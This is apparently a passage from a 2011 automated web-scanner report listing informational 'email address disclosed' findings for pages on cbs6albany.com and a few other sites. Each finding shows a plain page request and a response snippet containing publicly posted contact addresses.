Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:26:02 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:36:02 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42512


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.108. http://www.cbs6albany.com/sections/rss/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/rss/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/rss/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:30 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:30 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59348


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.109. http://www.cbs6albany.com/sections/sales/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/sales/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/sales/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:38 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:38 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.110. http://www.cbs6albany.com/sections/satellitewaivers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/satellitewaivers/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/satellitewaivers/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:25:09 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:35:09 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.111. http://www.cbs6albany.com/sections/schoolclosures/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/schoolclosures/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/schoolclosures/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:21:15 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:31:15 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 37793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.112. http://www.cbs6albany.com/sections/schoolwatch/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/schoolwatch/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/schoolwatch/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:31 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:31 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.113. http://www.cbs6albany.com/sections/sitemap/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/sitemap/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/sitemap/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:40 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:40 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 40015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com" title="View Ask A Question stories">
...[SNIP]...
<a href="mailto:news@cbs6albany.com" title="View Submit Photos stories">
...[SNIP]...
<a href="mailto:news@cbs6albany.com" title="View Send Us a Tip stories">
...[SNIP]...
<a href="mailto:news@cbs6albany.com" title="View Ask A Question stories">
...[SNIP]...

21.114. http://www.cbs6albany.com/sections/sp-alerts/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/sp-alerts/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sections/sp-alerts/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:21:05 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:31:05 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 37038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:support@freedom.com">
...[SNIP]...

21.115. http://www.cbs6albany.com/sections/traffic-events/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/traffic-events/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/traffic-events/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:32 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:32 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 41994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.116. http://www.cbs6albany.com/sections/traffic/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/traffic/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/traffic/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:07 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 28890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.117. http://www.cbs6albany.com/sections/tvlistings/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/tvlistings/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/tvlistings/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:20:33 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:30:33 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.118. http://www.cbs6albany.com/sections/videocopies/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/videocopies/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sections/videocopies/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:50 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:50 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42187


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:adirondackvideo@yahoo.com">adirondackvideo@yahoo.com</a>
...[SNIP]...

21.119. http://www.cbs6albany.com/sections/weather/7day/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/weather/7day/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/weather/7day/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:18:51 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:28:51 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.120. http://www.cbs6albany.com/sections/web-links/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/web-links/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/web-links/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:18 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:18 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59475


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.121. http://www.cbs6albany.com/sections/wrgb-talent/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/wrgb-talent/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/wrgb-talent/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:16 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:16 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 26962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.122. http://www.cbs6albany.com/sections/you-paid-for-it/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/you-paid-for-it/

Issue detail

The following email address was disclosed in the response:

Request

GET /sections/you-paid-for-it/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:23 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:23 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 70814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...
<a href="mailto:news@cbs6albany.com">
...[SNIP]...

21.123. http://www.dominionenterprises.com/main/do/Privacy_Policy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dominionenterprises.com
Path:   /main/do/Privacy_Policy

Issue detail

The following email address was disclosed in the response:

Request

GET /main/do/Privacy_Policy HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:05:52 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=7d3a89d5f21954b4e37104192891668e; expires=Sun, 30 Jan 2011 18:05:52 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:05:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Content-Length: 33701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Privacy Policy</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-
...[SNIP]...
<a href="mailto:IPadministrator@dominionenterprises.com">IPadministrator@dominionenterprises.com</a>
...[SNIP]...
<a href="mailto:IPadministrator@dominionenterprises.com">IPadministrator@dominionenterprises.com</a>
...[SNIP]...

21.124. http://www.dominionenterprises.com/main/do/Terms_of_Use

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dominionenterprises.com
Path:   /main/do/Terms_of_Use

Issue detail

The following email address was disclosed in the response:

Request

GET /main/do/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:05:52 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=f55dc9f4da1f9269275d3d70f7d2e82a; expires=Sun, 30 Jan 2011 18:05:52 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:05:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Set-Cookie: TSa27990=939a3b6a072740b6e33cc3abedde002f435053cfeb6a1fbb4d42fbb39c5eca85e318bc02; Path=/
Content-Length: 45884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Terms of Use</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-eq
...[SNIP]...
<a href="mailto:IPadministrator@dominionenterprises.com"><strong>IPadministrator@dominionenterprises.com</strong>
...[SNIP]...
<a href="mailto:IPadministrator@dominionenterprises.com"><strong>IPadministrator@dominionenterprises.com</strong>
...[SNIP]...

21.125. http://www.moxiesoft.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
